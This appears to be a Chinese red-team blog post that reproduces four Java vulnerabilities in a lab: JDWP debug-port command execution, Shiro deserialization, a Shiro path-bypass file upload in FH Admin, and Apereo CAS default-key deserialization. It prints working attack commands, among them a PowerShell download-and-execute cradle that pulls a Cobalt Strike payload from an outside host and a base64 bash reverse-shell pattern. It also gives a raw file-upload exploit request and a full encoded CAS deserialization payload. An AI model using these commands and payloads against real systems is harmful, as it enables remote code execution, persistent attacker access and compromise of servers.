红队打点-java 漏洞（一）

2021-10-28 本文已影响0人 CSeroad

前言

实际打点过程中遇到大量java相关的漏洞，在尚未熟悉java之前，做不了漏洞分析，这里先对实战中遇到的相关漏洞进行整理。

JDWP 远程命令执行

漏洞简介

JDWP 是JVM虚拟机支持的一种远程调式协议，在远程调式的时候使用。如果开启了一个调试端口的JAVA应用，就有可能利用JDWP进行远程调式来执行命令。

漏洞复现

在启动tomcat时的startup.bat配置文件中，首行添加如下命令：

SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000

即可在8000端口上开启JDWP协议。
再次查看本地开放端口。

image.png

指纹

利用nmap扫描该端口

nmap -Pn  -A -T4  10.211.55.31 -p 8000 -v

image.png

证明使用JDWP 协议

利用方法

利用 jdwp-shellifier 脚本可执行命令。

python jdwp-shellifier.py -t  10.211.55.31 -p 8000 --break-on  "java.lang.String.indexof" --cmd  "ping -c 1 nts6in.dnslog.cn"

image.png

出现Runtime.exec() successful表示利用该方法执行命令成功。

image.png

windows 平台可通过cobaltstrike的powershell一句话直接上线。

python jdwp-shellifier.py -t  10.211.55.19 -p 8000 --break-on  "java.lang.String.indexof" --cmd  "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xxx:83/a'))\""

image.png

linux 平台可通过{echo,base64编码反弹shell}|{base64,-d}|{bash,-i} 反弹上线。

image.png

也可以利用metasploit的multi/misc/java_jdwp_debugger 模块，使用的时候注意区分是windows系统还有linux系统，以及木马的易查杀问题。

image.png

shiro 反序列化

漏洞简介

Apache Shiro是一个Java安全框架，执行身份验证、授权、密码和会话管理。
shiro默认使用的AES的密钥为硬编码，导致攻击者可以构造恶意数据造成反序列化RCE漏洞。
影响版本：shiro<=1.2.4

漏洞复现

部署war包即可。

image.png

指纹

header="rememberme=deleteMe"

也是推荐pmiaowu师傅的 https://github.com/pmiaowu/BurpShiroPassiveScan 被动式扫描插件。

利用方式

目前检测shiro漏洞的工具也都很成熟了。这里推荐二款工具，使用起来也很简单。
如：https://github.com/feihong-cs/ShiroExploit-Deprecated

image.png

如：https://github.com/wyzxxz/shiro_rce_tool

image.png

shiro 权限绕过

漏洞简介

shiro的权限绕过，是shiro对uri的解析规则和后端开发框架的解析规则不一样所导致的。

漏洞复现

如FHAdmin 框架使用了shiro，可以通过;/的方式进行绕过并任意文件上传。

image.png

指纹

header="rememberme=deleteMe"

利用方式

如FH Admin 框架就存在该漏洞。

POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1
Accept-Encoding: gzip, deflate
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8Connection: close
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 176
Content-Type: multipart/form-data; boundary=653e1298053b919b8c365d524e9c45b3

--653e1298053b919b8c365d524e9c45b3
Content-Disposition: form-data; name="imgFile"; filename="loginc.txt"
Content-Type: image/jpeg

123
--653e1298053b919b8c365d524e9c45b3--

可任意文件上传。上传后保存在应用目录的/plugins/uploadify/下，且uploadPath可任意修改。

Apereo CAS 反序列化

漏洞简介

Apereo CAS 是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。在4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发反序列化漏洞。

漏洞复现

下载war包
https://mvnrepository.com/artifact/org.jasig.cas/cas-server-webapp/4.1.1
直接部署到tomcat的webapps下即可。

image.png

指纹

title="CAS &#8211; Central Authentication Service"
ico 图标

利用方式

默认账号/密码：casuser/Mellon
下载 https://github.com/potats0/CasExp 源码，输出payload，方便在数据包查看。
然后maven重新打包即可。
如果导sun.misc.BASE64Encoder 包时出现错误。可以尝试在Build Path中，Add External Jars添加 %JAVA_HOME%\jre\lib\rt.jar 这个包解决。

image.png

因为execution参数由默认秘钥构造的反序列化，每次传入不同的命令值也会相应变化。
故这里抽取出相关参数，手动构造数据包。记得URL编码。
具体数据包如下：

POST /cas-server-webapp-4.1.1/login;jsessionid=B662B67C75F008130B38E70A83F6CAF3 HTTP/1.1
Host: 10.211.55.31:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9213
Origin: http://10.211.55.31:8080
Connection: close
Referer: http://10.211.55.31:8080/cas-server-webapp-4.1.1/login
Cookie: JSESSIONID=B662B67C75F008130B38E70A83F6CAF3; bdshare_firstime=1629255297080; UM_distinctid=17ba5ad750853c-0ca62b52d638d9-445c6e-1aeaa0-17ba5ad7509258; CNZZDATA80862620=cnzz_eid%3D843992321-1630513214-%26ntime%3D1630513214
Upgrade-Insecure-Requests: 1

username=13222233322&password=Test1234&lt=LT-215706-O4ejY5ldDQpHMB9WdQbe0trNaM28Wf-cas01.example.org&execution=7b951c2a-e78f-4286-95fe-970782352a84_%41%41%41%41%49%67%41%41%41%42%43%59%43%74%54%54%4a%63%32%77%35%46%64%62%7a%68%2b%74%43%57%69%67%41%41%41%41%42%6d%46%6c%63%7a%45%79%4f%4c%35%34%46%37%64%68%6b%77%67%50%56%43%5a%74%65%48%47%73%2f%49%34%53%2b%53%6c%2f%32%6e%67%6a%48%70%51%51%46%37%50%55%57%79%2b%72%34%31%43%73%54%48%37%64%37%4e%58%43%72%36%36%76%57%6a%54%6e%61%61%74%67%7a%6d%41%6b%44%36%41%68%45%2b%61%70%72%46%51%66%74%6a%77%67%34%6e%69%72%57%79%7a%34%38%43%38%31%71%58%48%70%70%76%38%6a%71%4c%72%6f%6e%35%50%75%45%43%33%33%56%37%4b%2b%53%48%67%32%57%4f%59%4b%42%4b%41%38%49%2b%4b%48%67%46%41%33%31%51%4e%55%2b%6c%66%42%4f%36%76%6d%43%57%36%61%6a%64%32%69%6f%35%2b%39%67%61%79%6c%50%30%74%2f%46%39%57%6d%32%64%68%36%63%50%49%63%7a%67%44%6d%73%57%35%4b%72%4f%57%38%7a%35%6b%4f%38%78%75%31%5a%38%31%56%2b%33%52%74%30%6b%78%2b%6b%71%35%5a%45%50%68%4d%6b%75%46%52%6c%6d%49%67%62%71%54%56%59%48%67%44%74%38%6f%69%49%31%41%4a%78%4f%70%45%71%6c%71%58%63%50%30%56%49%79%49%36%70%56%54%61%75%62%63%47%73%68%4e%32%78%45%4e%6a%6d%72%6c%37%55%46%6a%50%36%4b%5a%70%79%34%68%71%45%48%71%46%33%45%47%69%58%38%72%51%56%53%56%74%52%6d%54%48%6e%6f%47%70%5a%6b%4b%6c%31%62%66%59%54%34%7a%4f%74%34%30%36%6a%77%4d%30%72%79%47%67%72%55%49%6a%73%71%6d%6a%61%2f%35%43%66%4f%4c%66%33%62%53%4f%74%44%32%58%63%41%54%4a%2b%69%37%44%4b%2f%7a%51%76%35%65%46%4e%34%61%6f%44%44%32%34%75%77%4b%66%69%32%37%46%4a%53%52%48%77%48%6f%64%48%4f%4a%71%68%36%48%73%2b%31%4c%41%78%73%48%6e%77%2b%69%58%2b%32%70%43%31%51%53%33%6f%50%71%43%77%6e%4e%58%34%72%69%45%4c%45%4e%38%63%6d%5a%55%30%39%5a%71%2b%33%5a%48%6c%76%6b%79%6d%32%4a%38%58%47%4d%61%66%4a%4c%4c%70%78%46%6d%4b%43%76%61%47%5a%46%79%4d%37%6e%2f%36%6f%67%79%58%2b%75%37%4a%6e%43%46%74%37%30%4e%41%39%37%42%39%57%49%52%67%42%36%6b%34%45%44%6a%4b%64%33%45%78%63%5a%64%36%48%53%6b%33%33%70%36%53%50%6d%6e%50%4e%64%59%32%34%4e%42%48%6b%75%70%37%6f%6a%33%38%77%62%36%4c%38%6c%53%41%53%66%31%61%46%76%46%55%32%46%77%6d%74%6f%71%74%6c%69%65%66%6c%68%4d%34%65%34%4f%4d%4c%69%68%79%61%4a%6a%4b%52%50%76%59%34%68%54%42%4a%6a%2b%44%72%6b%37%39%4e%49%53%49%69%65%53%67%6b%32%64%36%43%30%45%55%78%79%75%73%5a%31%30%56%5a%45%30%77%70%6f%47%35%59%43%31%35%6a%74%57%75%78%41%39%76%74%54%62%68%58%64%52%34%42%57%34%44%58%2f%69%62%67%4b%37%38%4a%70%6c%4d%70%6a%35%67%4e%2f%4a%59%79%4e%44%45%46%30%4e%64%78%37%38%59%61%6f%49%35%57%57%72%41%32%39%61%72%51%35%2f%76%50%61%77%6b%79%69%42%32%69%48%50%4f%33%57%49%37%56%2f%7a%51%35%50%6f%59%78%4b%44%72%4a%30%44%70%30%49%4e%35%37%39%6c%4b%66%75%67%55%59%45%44%73%2b%6c%35%62%57%6d%5a%59%33%55%6f%2f%4f%79%33%38%59%71%6a%47%47%50%4d%57%65%75%77%74%64%70%4c%34%6c%69%4f%59%34%58%37%30%77%34%63%54%45%5a%30%68%44%66%4e%75%73%72%43%70%53%71%45%53%50%59%4a%6a%6e%4d%6c%4d%4b%6f%6c%78%37%6f%4a%46%4d%70%42%71%7a%65%41%54%2f%4d%77%45%2f%6f%6f%76%74%63%39%76%66%50%48%62%76%47%56%59%53%65%51%43%66%76%77%6b%51%57%47%68%53%79%4e%37%36%4e%6b%38%31%56%72%33%65%42%48%38%75%48%45%53%76%37%71%76%6d%6d%63%35%45%65%62%70%41%77%6d%48%49%66%4a%73%76%55%6b%43%42%4d%4c%6a%4f%37%7a%53%2f%75%41%51%44%6f%6b%77%4f%54%63%54%46%61%73%53%73%37%70%52%37%66%54%62%53%42%4b%64%53%35%76%35%6a%36%37%66%58%46%78%44%65%42%78%37%30%50%49%65%39%51%30%55%51%58%2b%4f%74%56%2b%58%75%61%48%51%42%31%36%4b%70%74%32%79%62%79%4f%57%4e%6e%4b%35%56%47%57%78%37%38%58%6a%4b%70%56%31%73%63%58%46%33%4e%6c%43%74%4f%65%49%44%58%66%72%41%53%66%7a%4b%4f%6c%34%65%6f%79%6b%74%79%59%66%41%30%4f%70%51%43%38%67%36%55%4d%70%31%38%78%46%71%41%57%4c%43%2f%6c%70%65%64%42%6c%56%76%5a%61%68%68%76%76%4d%52%31%37%39%49%56%63%73%4b%55%38%67%35%50%37%38%32%34%32%59%59%64%48%37%51%77%6b%52%57%64%4d%42%46%4c%64%4c%4d%4e%4f%77%52%33%4a%41%75%4f%64%42%48%6c%38%5a%61%73%43%49%48%39%56%79%4e%59%7a%53%48%47%50%32%4b%74%58%4c%78%48%73%43%4f%4c%79%4f%7a%6f%38%4a%62%30%63%5a%58%77%4e%69%6e%51%4a%4e%6b%49%58%59%72%2f%77%58%45%48%63%79%77%63%63%7a%39%57%44%38%33%48%59%50%77%67%6f%73%76%56%62%4b%7a%42%55%48%2f%54%58%69%4e%41%48%35%65%31%45%61%53%67%65%42%79%47%64%32%64%5a%47%35%55%57%78%77%65%61%66%51%78%4e%65%6e%45%31%77%6c%65%64%35%53%30%67%6a%57%51%65%43%76%55%62%67%35%52%45%70%4b%71%35%6e%6a%52%62%61%63%38%49%64%67%52%53%77%58%46%4c%44%4e%46%35%62%48%42%30%6b%6c%48%51%6b%6a%46%37%66%62%39%44%5a%79%57%42%43%50%47%75%4c%56%35%2f%6d%76%2b%53%47%30%51%5a%4d%44%75%52%56%75%4f%39%38%4b%6c%6e%6d%4d%43%36%45%70%5a%49%4a%36%71%56%39%34%79%58%52%57%6e%35%35%55%50%7a%4c%51%64%71%32%79%61%5a%46%71%49%31%4b%72%2f%34%51%6e%4b%49%58%66%54%4a%4c%51%72%64%2b%4b%47%6a%54%34%65%49%61%57%71%4c%4c%33%62%4c%6a%57%63%4f%4b%74%6e%74%68%34%46%6e%41%57%52%36%47%67%4a%4f%77%4a%63%35%73%6e%41%73%48%44%6e%6f%4d%73%79%67%6d%7a%49%45%6b%5a%52%33%7a%71%4d%72%67%66%48%41%63%52%44%30%62%50%68%65%6a%32%33%50%34%6b%75%35%68%41%31%44%2b%74%6e%6a%71%52%34%4a%6c%42%51%47%56%6b%69%53%48%47%34%68%2b%34%54%56%68%4f%4c%72%37%6e%51%50%53%37%6a%30%33%6f%2f%49%58%34%78%44%58%6d%77%68%41%74%2f%48%30%31%73%46%67%50%42%53%65%39%76%75%71%78%41%35%53%38%4b%78%2f%46%59%6e%54%52%39%62%6a%79%47%49%72%68%50%70%57%67%47%68%38%51%72%63%33%51%66%6c%30%77%70%78%2f%74%48%68%52%69%52%7a%68%39%6b%36%2f%47%41%44%74%69%6c%72%48%58%55%42%63%39%62%6e%59%44%4a%6c%34%6e%4c%61%6d%52%53%50%64%55%69%4b%6a%78%4d%78%35%2f%79%51%62%59%65%2f%4e%63%58%45%32%32%39%77%58%56%76%4a%45%74%70%4f%77%37%57%34%49%52%45%45%34%35%33%34%45%72%49%6e%37%78%71%37%73%52%6c%31%56%44%33%62%7a%32%71%43%66%37%4a%74%52%4e%42%30%32%39%42%33%65%35%68%44%66%46%56%76%2f%74%38%30%4b%6f%33%70%4b%57%42%6a%6c%48%67%67%46%62%54%30%32%74%73%68%62%43%6f%65%37%72%42%44%4b%58%4f%58%74%7a%64%35%46%74%70%46%33%71%58%63%6a%57%71%78%49%56%54%48%50%62%54%56%67%75%44%34%70%5a%6c%49%5a%53%75%4c%59%75%70%43%4c%54%62%62%72%53%52%44%74%46%6e%67%4b%4f%4e%34%78%71%4f%4e%39%6e%4e%31%55%54%77%4f%2f%46%32%65%74%48%4a%65%49%65%61%74%73%79%41%64%58%67%48%59%45%58%33%45%71%6b%30%6d%6c%6d%33%72%6b%63%38%43%79%35%61%73%74%44%62%64%61%37%68%59%31%52%67%35%79%2b%37%67%34%31%76%45%62%42%6b%4f%6d%46%4d%33%48%54%6f%78%57%45%4d%2b%4f%56%31%62%73%76%53%32%4d%30%58%50%32%31%68%5a%34%32%2f%4d%63%70%48%4f%68%6e%69%4b%37%6e%62%52%70%75%4d%52%77%75%48%50%62%4d%39%47%4c%47%56%73%6b%4e%58%4b%34%61%2f%5a%47%58%4b%48%67%36%51%64%71%65%57%2f%63%75%68%6c%62%56%67%75%58%63%6a%62%45%6f%5a%44%6a%54%32%66%4d%36%59%73%63%65%65%5a%2f%70%38%6f%78%2b%53%2f%42%4c%49%76%30%2f%41%2b%51%4a%42%78%61%50%32%62%61%32%37%54%68%2f%4d%4f%6a%49%33%5a%76%6b%35%72%73%53%6f%52%31%48%67%39%6a%46%71%41%53%32%72%53%43%69%6a%79%67%51%68%75%6e%68%52%67%4a%59%4b%54%39%4e%61%6a%7a%73%31%6b%37%56%73%32%70%43%4a%6f%4e%7a%44%78%35%63%61%79%31%56%32%33%41%78%6b%38%50%33%44%31%62%6b%6f%47%64%77%66%39%71%6c%63%57%79%31%34%53%33%31%7a%39%73%65%65%47%6c%6b%4c%30%69%37%52%6b%67%64%6d%53%42%5a%2f%67%45%50%66%50%68%70%2b%38%50%63%65%69%6a%72%45%51%58%39%4a%49%56%5a%48%62%78%38%53%2b%38%55%6b%6d%4b%39%74%65%66%71%4e%55%53%44%4d%31%4a%41%32%78%41%49%76%58%6b%65%38%30%52%63%75%42%48%73%64%6f%6d%7a%39%31%72%63%66%72%69%79%2f%7a%6a%46%37%6c%66%33%38%79%57%36%49%52%69%72%44%77%52%62%36%61%39%36%39%41%4f%31%36%49%73%78%52%6a%61%78%35%5a%7a%57%70%59%45%69%62%75%6b%44%6a%68%75%2b%70%72%78%79%43%63%71%78%61%45%57%58%70%4e%38%2f%43%75%54%57%38%31%6b%77%68%48%64%6d%30%6b%43%32%4b%69%4f%54%45%77%34%79%74%4f%6b%76%35%59%34%73%50%37%62%70%30%54%6c%47%52%54%4d%65%6e%73%4a%63%79%43%41%38%5a%37%73%38%39%63%63%57%32%64%52%36%56%64%45%5a%43%70%69%64%63%4b%4b%51%46%6d%7a%69%43%69%36%35%4b%2b%4f%38%6b%30%47%69%78%6e%74%6a%6a%57%2b%62%64%4b%2b%66%38%6e%7a%65%66%64%36%61%43%77%79%6e%39%35%64%56%55%50%36%38%31%4b%2f%45%62%49%2f%52%52%45%73%62%31%61%2b%2f%55%73%43%39%71%6c%42%32%38%45%55%61%58%55%35%4c%6f%51%43%53%39%4d%67%64%75%59%6b%4b%79%55%58%56%50%58%6d%74%4b%6f%62%39%43%4e%64%7a%49%69%79%2f%56%48%73%57%70%4b%36%67%62%37%64%50%78%62%7a%38%77%78%45%44%52%58%4e%4f%71%45%74%2b%51%6f%74%66%45%61%41%72%61%4a%30%4e%72%4c%51%35%49%35%75%4e%32%49%78%4d%76%62%73%73%70%61%4d%43%2b%77%4a%68%58%6e%76%39%65%57%72%43%50%76%75%55%55%57%6d%45%49%68%6f%54%63%33%61%43%41%4f%44%65%2f%45%54%45%56%31%6b%57%44%73%48%37%67%30%2f%54%4f%38%39%67%58%55%6d%7a%65%49%31%6e%78%67%38%55%7a%6d%44%43%48%30%6f%55%50%53%4d%47%51%36%4b%7a%43%61%33%74%59%4c%35%50%74%47%65%47%76%55%66%48%4f%57%6e%6e%69%69%2b%65%32%66%33%4a%68%5a%53%35%4b%6a%6a%71%49%36%61%79%79%47%77%66%38%54%35%70%69%2f%53%6b%36%38%57%46%6f%31%71%68%34%46%58%46%7a%66%41%62%46%4d%52%4d%31%6e%76%6b%63%68%4c%2f%63%6d%48%5a%43%37%55%53%53%4f%31%72%4a%72%64%6d%36%64%72%4e%45%69%31%64%43%5a%63%33%48%79%75%30%46%51%70%2b%30%48%55%46%6e%47%47%46%39%4b%58%34%79%72%34%39%4f%39%71%50%35%75%72%79%41%4e%35%63%6a%73%69%63%59%76%76%32%69%33%54%45%4e%50%5a%56%34%47%59%4f%74%4a%6f%6e%51%35%4f%64%55%52%69%79%2b%38%6b%56%31%35%78%2f%6e%4f%5a%58%30%7a%74%4e%68%75%72%31%41%55%68%68%57%63%30%65%6b%53%38%66%47%52%49%4c%2f%56%58%62%54%33%42%50%63%4d%55%42%34%7a%32%41%76%50%43%79%68%4e%57%75%62%75%6a%42%75%54%2f%35%55%76%56%62%4a%4d%77%6b%6c%6e%63%34%6d%76%62%79%38%75%6a%34%65%36%52%6a%75%5a%2f%39%53%68%53%47%62%31%79%69%30%37%58%41%45%68%39%36%70%61%66%72%44%59%65%49%4c%55%66%4c%48%4f%71%63%65%49%67%56%4b%44%32%6e%6e%56%76%71%54%44%67%61%57%72%41%68%77%2b%48%43%78%64%5a%4d%51%3d&_eventId=submit&submit=LOGIN

image.png

总结

复现了jdwp命令执行、shiro框架的反序列化和权限绕过、cas反序列化四个不同的漏洞，也算是了解了java版本对漏洞利用的影响。

红队打点-java 漏洞（一）

前言

JDWP 远程命令执行

漏洞简介

漏洞复现

指纹

利用方法

shiro 反序列化

漏洞简介

漏洞复现

指纹

利用方式

shiro 权限绕过

漏洞简介

漏洞复现

指纹

利用方式

Apereo CAS 反序列化

漏洞简介

漏洞复现

指纹

利用方式

总结

猜你喜欢

热点阅读